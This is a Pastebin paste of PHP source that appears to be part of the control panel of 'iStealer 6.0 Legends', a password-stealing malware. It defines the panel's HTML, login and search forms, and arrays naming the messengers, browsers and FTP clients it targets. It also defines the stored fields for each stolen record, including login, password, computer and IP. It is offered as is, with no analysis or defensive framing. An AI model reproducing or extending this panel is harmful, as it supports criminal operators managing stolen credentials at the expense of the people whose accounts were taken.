Advertisement
Guest User

Untitled

a guest
Sep 8th, 2017
223
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
  1.  
  2. $html = "<html><head><title>iStealer 6.0 Legends Log manager - ";
  3. $header = "</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>
  4. <div id='web'><div id='header'><b>Hello, ".$username."</b></div><div id='navigation'><ul>
  5. <li><a href='?action=logs'>Show All Logs</a></li><li><a href='?action=search'>Search</a></li>
  6. <li><a href='?action=exportall'>Export All Logs</a></li>
  7. <li><a href='?action=logout'>Logout</a></li></ul></div><br>";
  8. $footer = "<div id='footer'>iStealer 6.0 Legends - Kizar Labs 2009</div></div></body></html>";
  9. $searchform = "<form name='search' method='POST' action='?action=search'>
  10. Search for: <input type='text' name='q' size='20'> In: <select name='in'>
  11. <option selected='selected' value='1'>Url</option><option value='2'>Login</option>
  12. <option value='3'>Password</option><option value='4'>Computer</option>
  13. <option value='5'>Date</option><option value='6'>Ip</option></select>
  14. <input type='submit' value='Search' name='search'></form>";
  15. $loginform = "<form id='loginform' name='frm' method='POST' action='?action=login'>
  16. <table id='logintable' cellpadding='0' cellspacing='10' border='0'>
  17. <tr><td>Username:</td><td><input type='text' name='username' size='20'></td></tr>
  18. <tr><td>Password:</td><td><input type='password' name='password' size='20'></td></tr>
  19. <tr><td></td><td><input type='submit' value='Login' name='login'></td></tr></form>";
  20. $javascript = "<script language='javascript' type='text/javascript'>
  21. function checkAll() { chk = document.getElementsByName('sel[]');
  22. for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_all'].checked) chk[i].checked = true; else chk[i].checked = false;}}
  23. function checkform() { chk = document.getElementsByName('sel[]'); for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) {
  24. return true;}} alert('At least one option must be select.'); return false; }
  25. function confirmation() { return confirm('Are you sure you want to delete all selected logs?');}</script>";
  26. $aplications = array("MSN Messenger", "Google talk", "Trillian/MSN", "Trillian/AIM", "Trillian/Yahoo", "Pidgin/Gaim", "Paltalk Scene", "Steam",
  27. "No-Ip" , "DynDNS", "Firefox", "Internet Explorer", "Google Chrome", "Opera", "IDM", "FileZilla", "FlashFXP", "SmartFtp", "CuteFtp");
  28. $cols = array("program", "url", "login", "pass", "computer", "date", "ip");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement